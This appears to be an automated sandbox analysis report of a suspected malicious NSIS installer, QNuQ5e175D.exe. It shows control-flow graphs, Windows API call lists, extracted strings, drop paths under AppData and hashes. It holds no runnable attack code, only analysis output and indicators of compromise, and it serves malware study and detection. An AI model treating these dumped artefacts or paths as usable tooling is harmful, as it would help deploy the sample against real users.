                                                        control_flow_graph 202 403ff7-404009 203 404170-40417f 202->203 204 40400f-404015 202->204 206 404181-4041c9 GetDlgItem * 2 call 4044f6 SetClassLongW call 40140b 203->206 207 4041ce-4041e3 203->207 204->203 205 40401b-404024 204->205 210 404026-404033 SetWindowPos 205->210 211 404039-404040 205->211 206->207 208 404223-404228 call 404542 207->208 209 4041e5-4041e8 207->209 221 40422d-404248 208->221 213 4041ea-4041f5 call 401389 209->213 214 40421b-40421d 209->214 210->211 216 404042-40405c ShowWindow 211->216 217 404084-40408a 211->217 213->214 238 4041f7-404216 SendMessageW 213->238 214->208 220 4044c3 214->220 222 404062-404075 GetWindowLongW 216->222 223 40415d-40416b call 40455d 216->223 224 4040a3-4040a6 217->224 225 40408c-40409e DestroyWindow 217->225 234 4044c5-4044cc 220->234 231 404251-404257 221->231 232 40424a-40424c call 40140b 221->232 222->223 233 40407b-40407e ShowWindow 222->233 223->234 227 4040a8-4040b4 SetWindowLongW 224->227 228 4040b9-4040bf 224->228 235 4044a0-4044a6 225->235 227->234 228->223 237 4040c5-4040d4 GetDlgItem 228->237 242 404481-40449a DestroyWindow EndDialog 231->242 243 40425d-404268 231->243 232->231 233->217 235->220 241 4044a8-4044ae 235->241 244 4040f3-4040f6 237->244 245 4040d6-4040ed SendMessageW IsWindowEnabled 237->245 238->234 241->220 246 4044b0-4044b9 ShowWindow 241->246 242->235 243->242 247 40426e-4042bb call 4065b4 call 4044f6 * 3 GetDlgItem 243->247 248 4040f8-4040f9 244->248 249 4040fb-4040fe 244->249 245->220 245->244 246->220 274 4042c5-404301 ShowWindow KiUserCallbackDispatcher call 404518 EnableWindow 247->274 275 4042bd-4042c2 247->275 252 404129-40412e call 4044cf 248->252 253 404100-404106 249->253 254 40410c-404111 249->254 252->223 257 404147-404157 SendMessageW 253->257 258 404108-40410a 253->258 254->257 259 404113-404119 254->259 257->223 258->252 262 404130-404139 call 40140b 259->262 263 40411b-404121 call 40140b 259->263 262->223 271 40413b-404145 262->271 272 404127 263->272 271->272 272->252 278 404303-404304 274->278 279 404306 274->279 275->274 280 404308-404336 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404338-404349 SendMessageW 280->281 282 40434b 280->282 283 404351-404390 call 40452b call 403fd8 call 406577 lstrlenW call 4065b4 SetWindowTextW call 401389 281->283 282->283 283->221 294 404396-404398 283->294 294->221 295 40439e-4043a2 294->295 296 4043c1-4043d5 DestroyWindow 295->296 297 4043a4-4043aa 295->297 296->235 298 4043db-404408 CreateDialogParamW 296->298 297->220 299 4043b0-4043b6 297->299 298->235 300 40440e-404465 call 4044f6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 298->300 299->221 301 4043bc 299->301 300->220 306 404467-40447a ShowWindow call 404542 300->306 301->220 308 40447f 306->308 308->235
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404033
                                                        • ShowWindow.USER32(?), ref: 00404053
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404065
                                                        • ShowWindow.USER32(?,00000004), ref: 0040407E
                                                        • DestroyWindow.USER32 ref: 00404092
                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 004040AB
                                                        • GetDlgItem.USER32(?,?), ref: 004040CA
                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040DE
                                                        • IsWindowEnabled.USER32(00000000), ref: 004040E5
                                                        • GetDlgItem.USER32(?,00000001), ref: 00404190
                                                        • GetDlgItem.USER32(?,00000002), ref: 0040419A
                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 004041B4
                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404205
                                                        • GetDlgItem.USER32(?,00000003), ref: 004042AB
                                                        • ShowWindow.USER32(00000000,?), ref: 004042CC
                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042DE
                                                        • EnableWindow.USER32(?,?), ref: 004042F9
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040430F
                                                        • EnableMenuItem.USER32(00000000), ref: 00404316
                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040432E
                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404341
                                                        • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040436B
                                                        • SetWindowTextW.USER32(?,0042CA68), ref: 0040437F
                                                        • ShowWindow.USER32(?,0000000A), ref: 004044B3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                        • String ID:
                                                        • API String ID: 121052019-0
                                                        • Opcode ID: 85e06a1bfb462d71b49bda8b571905cea54c43c8c85ee92c4a54339351a5f343
                                                        • Instruction ID: 8cad316efbf8f9c89f6feec2797fb874042f4abab253e3557332251604c97906
                                                        • Opcode Fuzzy Hash: 85e06a1bfb462d71b49bda8b571905cea54c43c8c85ee92c4a54339351a5f343
                                                        • Instruction Fuzzy Hash: C6C1A1B1500204BBDB206F61EE89E2B3AA8FB85755F01453EF751B51F0CB39A8529B2D
                                                        Function 00403C49 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 309 403c49-403c61 call 40696b 312 403c63-403c73 call 4064be 309->312 313 403c75-403cac call 406445 309->313 322 403ccf-403cf8 call 403f1f call 405f4e 312->322 318 403cc4-403cca lstrcatW 313->318 319 403cae-403cbf call 406445 313->319 318->322 319->318 327 403d8a-403d92 call 405f4e 322->327 328 403cfe-403d03 322->328 334 403da0-403dc5 LoadImageW 327->334 335 403d94-403d9b call 4065b4 327->335 328->327 329 403d09-403d31 call 406445 328->329 329->327 336 403d33-403d37 329->336 338 403e46-403e4e call 40140b 334->338 339 403dc7-403df7 RegisterClassW 334->339 335->334 340 403d49-403d55 lstrlenW 336->340 341 403d39-403d46 call 405e73 336->341 353 403e50-403e53 338->353 354 403e58-403e63 call 403f1f 338->354 342 403f15 339->342 343 403dfd-403e41 SystemParametersInfoW CreateWindowExW 339->343 347 403d57-403d65 lstrcmpiW 340->347 348 403d7d-403d85 call 405e46 call 406577 340->348 341->340 346 403f17-403f1e 342->346 343->338 347->348 352 403d67-403d71 GetFileAttributesW 347->352 348->327 357 403d73-403d75 352->357 358 403d77-403d78 call 405e92 352->358 353->346 362 403e69-403e83 ShowWindow call 4068fb 354->362 363 403eec-403eed call 4056cf 354->363 357->348 357->358 358->348 370 403e85-403e8a call 4068fb 362->370 371 403e8f-403ea1 GetClassInfoW 362->371 366 403ef2-403ef4 363->366 368 403ef6-403efc 366->368 369 403f0e-403f10 call 40140b 366->369 368->353 372 403f02-403f09 call 40140b 368->372 369->342 370->371 375 403ea3-403eb3 GetClassInfoW RegisterClassW 371->375 376 403eb9-403edc DialogBoxParamW call 40140b 371->376 372->353 375->376 380 403ee1-403eea call 403b99 376->380 380->346
                                                        APIs
                                                          • Part of subcall function 0040696B: GetModuleHandleA.KERNEL32(?,00000020,?,00403662,0000000C,?,?,?,?,?,?,?,?), ref: 0040697D
                                                          • Part of subcall function 0040696B: GetProcAddress.KERNEL32(00000000,?), ref: 00406998
                                                        • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,756F3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",00008001), ref: 00403CCA
                                                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,756F3420), ref: 00403D4A
                                                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D5D
                                                        • GetFileAttributesW.KERNEL32(Call), ref: 00403D68
                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres), ref: 00403DB1
                                                          • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                        • RegisterClassW.USER32(004336A0), ref: 00403DEE
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403E06
                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E3B
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403E71
                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E9D
                                                        • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403EAA
                                                        • RegisterClassW.USER32(004336A0), ref: 00403EB3
                                                        • DialogBoxParamW.USER32(?,00000000,00403FF7,00000000), ref: 00403ED2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                        • API String ID: 1975747703-3434354963
                                                        • Opcode ID: a4b6b062c3cda51b96eb3e1e848ea22fea792b1bb39582dd55e536ebb93ad2e9
                                                        • Instruction ID: c722afd28cb3ad108a11d8546cd61d6ece1c23d3a169ae69e987cf65e7f86a01
                                                        • Opcode Fuzzy Hash: a4b6b062c3cda51b96eb3e1e848ea22fea792b1bb39582dd55e536ebb93ad2e9
                                                        • Instruction Fuzzy Hash: 7961C370500700BED620AF66AD46F2B3A6CEB85B5AF40053FF945B22E2DB7C5941CA6D
                                                        Function 004030A2 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 383 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406067 386 4030f2-4030f7 383->386 387 4030fc-40312a call 406577 call 405e92 call 406577 GetFileSize 383->387 388 4032d2-4032d6 386->388 395 403130 387->395 396 403215-403223 call 40303e 387->396 398 403135-40314c 395->398 402 403225-403228 396->402 403 403278-40327d 396->403 400 403150-403159 call 4034f4 398->400 401 40314e 398->401 410 40327f-403287 call 40303e 400->410 411 40315f-403166 400->411 401->400 405 40322a-403242 call 40350a call 4034f4 402->405 406 40324c-403276 GlobalAlloc call 40350a call 4032d9 402->406 403->388 405->403 434 403244-40324a 405->434 406->403 432 403289-40329a 406->432 410->403 412 4031e2-4031e6 411->412 413 403168-40317c call 406022 411->413 420 4031f0-4031f6 412->420 421 4031e8-4031ef call 40303e 412->421 413->420 430 40317e-403185 413->430 423 403205-40320d 420->423 424 4031f8-403202 call 406a58 420->424 421->420 423->398 431 403213 423->431 424->423 430->420 436 403187-40318e 430->436 431->396 437 4032a2-4032a7 432->437 438 40329c 432->438 434->403 434->406 436->420 439 403190-403197 436->439 440 4032a8-4032ae 437->440 438->437 439->420 441 403199-4031a0 439->441 440->440 442 4032b0-4032cb SetFilePointer call 406022 440->442 441->420 443 4031a2-4031c2 441->443 446 4032d0 442->446 443->403 445 4031c8-4031cc 443->445 447 4031d4-4031dc 445->447 448 4031ce-4031d2 445->448 446->388 447->420 449 4031de-4031e0 447->449 448->431 448->447 449->420
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004030B3
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\QNuQ5e175D.exe,00000400), ref: 004030CF
                                                          • Part of subcall function 00406067: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040606B
                                                          • Part of subcall function 00406067: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                        • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QNuQ5e175D.exe,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040311B
                                                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\QNuQ5e175D.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                        • API String ID: 2803837635-3711894650
                                                        • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                        • Instruction ID: 55eb758a8cc994b5b8f5e8324c308f37a69edd03a8198e206d37cac48cd63750
                                                        • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                        • Instruction Fuzzy Hash: E9519171900204AFDB209FA5DD86B9E7EACEB09356F20417BF504B62D1C7789F408BAD
                                                        Function 004065B4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204stringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 735 4065b4-4065bd 736 4065d0-4065ea 735->736 737 4065bf-4065ce 735->737 738 4065f0-4065fc 736->738 739 4067fa-406800 736->739 737->736 738->739 742 406602-406609 738->742 740 406806-406813 739->740 741 40660e-40661b 739->741 743 406815-40681a call 406577 740->743 744 40681f-406822 740->744 741->740 745 406621-40662a 741->745 742->739 743->744 747 406630-406673 745->747 748 4067e7 745->748 751 406679-406685 747->751 752 40678b-40678f 747->752 749 4067f5-4067f8 748->749 750 4067e9-4067f3 748->750 749->739 750->739 753 406687 751->753 754 40668f-406691 751->754 755 406791-406798 752->755 756 4067c3-4067c7 752->756 753->754 759 406693-4066b1 call 406445 754->759 760 4066cb-4066ce 754->760 757 4067a8-4067b4 call 406577 755->757 758 40679a-4067a6 call 4064be 755->758 761 4067d7-4067e5 lstrlenW 756->761 762 4067c9-4067d2 call 4065b4 756->762 771 4067b9-4067bf 757->771 758->771 770 4066b6-4066b9 759->770 766 4066d0-4066dc GetSystemDirectoryW 760->766 767 4066e1-4066e4 760->767 761->739 762->761 772 40676e-406771 766->772 773 4066f6-4066fa 767->773 774 4066e6-4066f2 GetWindowsDirectoryW 767->774 775 406773-406776 770->775 776 4066bf-4066c6 call 4065b4 770->776 771->761 777 4067c1 771->777 772->775 778 406783-406789 call 406825 772->778 773->772 779 4066fc-40671a 773->779 774->773 775->778 781 406778-40677e lstrcatW 775->781 776->772 777->778 778->761 783 40671c-406722 779->783 784 40672e-406746 call 40696b 779->784 781->778 788 40672a-40672c 783->788 792 406748-40675b SHGetPathFromIDListW CoTaskMemFree 784->792 793 40675d-406766 784->793 788->784 790 406768-40676c 788->790 790->772 792->790 792->793 793->779 793->790
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066D6
                                                        • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,?,?,00000000,00000000,00425A20,756F23A0), ref: 004066EC
                                                        • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 0040674A
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406753
                                                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,?,?,00000000,00000000,00425A20,756F23A0), ref: 0040677E
                                                        • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,?,?,00000000,00000000,00425A20,756F23A0), ref: 004067D8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 4024019347-4218209683
                                                        • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                        • Instruction ID: fc4c1bf1ff31ba1b34cdfc75387d7881e57296f2874843d1a5ebc397bafcf832
                                                        • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                        • Instruction Fuzzy Hash: D16135716042009BD720AF24DD80B6B76E8EF85328F12453FF647B32D0DB7D9961865E
                                                        Function 004032D9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 794 4032d9-4032f0 795 4032f2 794->795 796 4032f9-403302 794->796 795->796 797 403304 796->797 798 40330b-403310 796->798 797->798 799 403320-40332d call 4034f4 798->799 800 403312-40331b call 40350a 798->800 804 4034e2 799->804 805 403333-403337 799->805 800->799 806 4034e4-4034e5 804->806 807 40348d-40348f 805->807 808 40333d-403386 GetTickCount 805->808 811 4034ed-4034f1 806->811 809 403491-403494 807->809 810 4034cf-4034d2 807->810 812 4034ea 808->812 813 40338c-403394 808->813 809->812 818 403496 809->818 816 4034d4 810->816 817 4034d7-4034e0 call 4034f4 810->817 812->811 814 403396 813->814 815 403399-4033a7 call 4034f4 813->815 814->815 815->804 827 4033ad-4033b6 815->827 816->817 817->804 828 4034e7 817->828 821 403499-40349f 818->821 824 4034a1 821->824 825 4034a3-4034b1 call 4034f4 821->825 824->825 825->804 831 4034b3-4034bf call 406119 825->831 830 4033bc-4033dc call 406ac6 827->830 828->812 836 4033e2-4033f5 GetTickCount 830->836 837 403485-403487 830->837 838 4034c1-4034cb 831->838 839 403489-40348b 831->839 840 403440-403442 836->840 841 4033f7-4033ff 836->841 837->806 838->821 842 4034cd 838->842 839->806 845 403444-403448 840->845 846 403479-40347d 840->846 843 403401-403405 841->843 844 403407-403438 MulDiv wsprintfW call 4055fc 841->844 842->812 843->840 843->844 853 40343d 844->853 847 40344a-403451 call 406119 845->847 848 40345f-40346a 845->848 846->813 849 403483 846->849 854 403456-403458 847->854 852 40346d-403471 848->852 849->812 852->830 855 403477 852->855 853->840 854->839 856 40345a-40345d 854->856 855->812 856->852
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CountTick$wsprintf
                                                        • String ID: *B$ ZB$ A$ A$... %d%%
                                                        • API String ID: 551687249-3856725213
                                                        • Opcode ID: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                                        • Instruction ID: 3a086bfa1ae904988031f2e91e2ff9394e13111a018eeb379290de00703e2b75
                                                        • Opcode Fuzzy Hash: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                                        • Instruction Fuzzy Hash: 2F519F71900219DBCB11DF65DA44B9E7FB8AF44766F10413BE810BB2D1C7789A40CBA9
                                                        Function 00401794 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 857 401794-4017b9 call 402dcb call 405ebd 862 4017c3-4017d5 call 406577 call 405e46 lstrcatW 857->862 863 4017bb-4017c1 call 406577 857->863 868 4017da-4017db call 406825 862->868 863->868 872 4017e0-4017e4 868->872 873 4017e6-4017f0 call 4068d4 872->873 874 401817-40181a 872->874 881 401802-401814 873->881 882 4017f2-401800 CompareFileTime 873->882 876 401822-40183e call 406067 874->876 877 40181c-40181d call 406042 874->877 884 401840-401843 876->884 885 4018b2-4018db call 4055fc call 4032d9 876->885 877->876 881->874 882->881 886 401894-40189e call 4055fc 884->886 887 401845-401883 call 406577 * 2 call 4065b4 call 406577 call 405bd7 884->887 899 4018e3-4018ef SetFileTime 885->899 900 4018dd-4018e1 885->900 897 4018a7-4018ad 886->897 887->872 921 401889-40188a 887->921 901 402c58 897->901 903 4018f5-401900 CloseHandle 899->903 900->899 900->903 905 402c5a-402c5e 901->905 906 401906-401909 903->906 907 402c4f-402c52 903->907 909 40190b-40191c call 4065b4 lstrcatW 906->909 910 40191e-401921 call 4065b4 906->910 907->901 914 401926-4023bd 909->914 910->914 919 4023c2-4023c7 914->919 920 4023bd call 405bd7 914->920 919->905 920->919 921->897 922 40188c-40188d 921->922 922->886
                                                        APIs
                                                        • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,?,?,00000031), ref: 004017D5
                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,?,?,00000031), ref: 004017FA
                                                          • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                          • Part of subcall function 004055FC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0), ref: 00405657
                                                          • Part of subcall function 004055FC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll), ref: 00405669
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
